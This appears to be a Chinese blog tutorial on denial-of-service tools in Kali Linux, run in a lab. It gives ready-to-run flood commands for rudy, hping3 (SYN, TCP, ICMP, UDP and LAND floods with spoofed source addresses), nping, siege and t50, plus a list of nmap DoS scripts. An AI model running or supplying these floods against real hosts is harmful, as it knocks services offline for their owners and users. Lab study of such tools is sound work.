(九)拒绝服务攻击工具

拒绝服务分类
攻击带宽
攻击并发
消耗cpu内存
攻击代码漏洞
1. rudy(r-y dead yet)
1. 简介
慢速应用层HTTP POST攻击,与slowhttptest原理相同
每次只传输一个字节的数据
美剧黑客军团”中曾提到此攻击手段
攻击有表单WEB页面,攻击时需指定攻击的参数名称
2. 测试
root@kali:~/rudy# ls
BeautifulSoup.py README r-u-dead-yet-v2.2.py socks.pyc
BeautifulSoup.pyc rudeadyet.conf socks.py
查找攻击参数和攻击的url
修改配置文件
攻击参数:username
root@kali:~/rudy# ./r-u-dead-yet-v2.2.py
2. Hping3
1. 简介
几乎可以定制发送任何 TCP/IP 数据包,用于测试 FW、端口扫描、性能测试
syn flood 攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 –flood –rand-source 192.168.8.158
hping3 -S -P -U -p 80 –flood –rand-source 10.10.10.132
hping3 -SARFUP -p 80 –flood –rand-source 10.10.10.132 (TCP Flood)
-c count 计数
-d date 数据长度
-S syn包
-w tcp的windows窗口大小
-p 端口
–rand-source 伪造源地址
ICMP Flood 攻击
hping3 -q -n -a 1.1.1.1 –icmp -d 200 –flood 10.10.10.132
UDP Flood 攻击
hping3 -a 1.1.1.1 –udp -s 53 -d 100 -p 53 –flood 10.10.10.132
2. 攻击
syn_flood 攻击
root@kali:~# hping3 -c 1000 -d 120 -S -w 64 -p 80 –flood –rand-source 192.168.8.158
又打挂掉了!
hping3 -S -P -U -p 80 –flood –rand-source 192.168.8.158
tcp_flood 攻击
root@kali:~# hping3 -SARFUP -p 80 –flood –rand-source 192.168.8.158
icmp_flood 攻击
-a 伪造源地址
root@kali:~# hping3 -q -n -a 1.1.1.1 –icmp -d 200 –flood 192.168.8.158
udp_flood 攻击
root@kali:~# hping3 -a 1.1.1.1 –udp -s 53 -d 100 -p 53 –flood 192.168.8.158
3. LAND 攻击
特殊种类的 SYN Flood 攻击
源地址和目的地址都是靶机IP,受害者和自己完成三次握手
hping3 -n -a 192.168.8.158 -S -d 100 -p 80 –flood 192.168.8.158
root@kali:~# hping3 -n -a 192.168.8.158 -S -d 100 -p 80 –flood 192.168.8.158
3. nping
TCP 全连接 DoS 攻击
nping –tcp-connect –rate=10000 -c 1000000000 -q 192.168.8.158
查公网 IP
nping –echo-client “public” echo.nmap.org –udp
4. Siege
http/https 压力测试工具,模拟多个用户并发访问请求
siege -g http://192.168.8.158
siege -i -c 1000 http://192.168.8.158 -A siegehttp
同时攻击多个 url ,使用 -f 调用字典文件
单独使用 siege -i -c 1000 ,也会调用字典文件(url 列表)
/etc/siege/urls.txt
# 查看 banner 信息
siege -g http://192.168.8.158
也可以使用nc连接去获取banner信息
root@kali:~# siege -i -c 1000 http://192.168.8.158 -A Mozilla/5.0 -vv
ulimit -n 增大open file的值
同时测试多个网站,可以使用siege字典文件,将我们需要测试的url放在该文件下,直接运行即可
root@kali:~# cat /etc/siege/urls.txt
root@kali:~# siege -i -c 1000
5. T50
网络压力测试
t50 192.168.8.158 –flood –turbo -S –protocol TCP –dport 80
t50 192.168.8.158 –flood –turbo -S TCP UDP OSPF EIGRP –dport 22
root@kali:~# t50 192.168.8.158 –flood –turbo -S –protocol TCP –dport 80
6. nmap
root@kali:~# grep dos /usr/share/nmap/scripts/script.db | cut -d “\” -f 2
broadcast-avahi-dos.nse
http-slowloris.nse
ipv6-ra-flood.nse
smb-flood.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-regsvc-dos.nse
posted @ 2019-03-14 07:24  micr067  阅读(379)  评论(0编辑  收藏  举报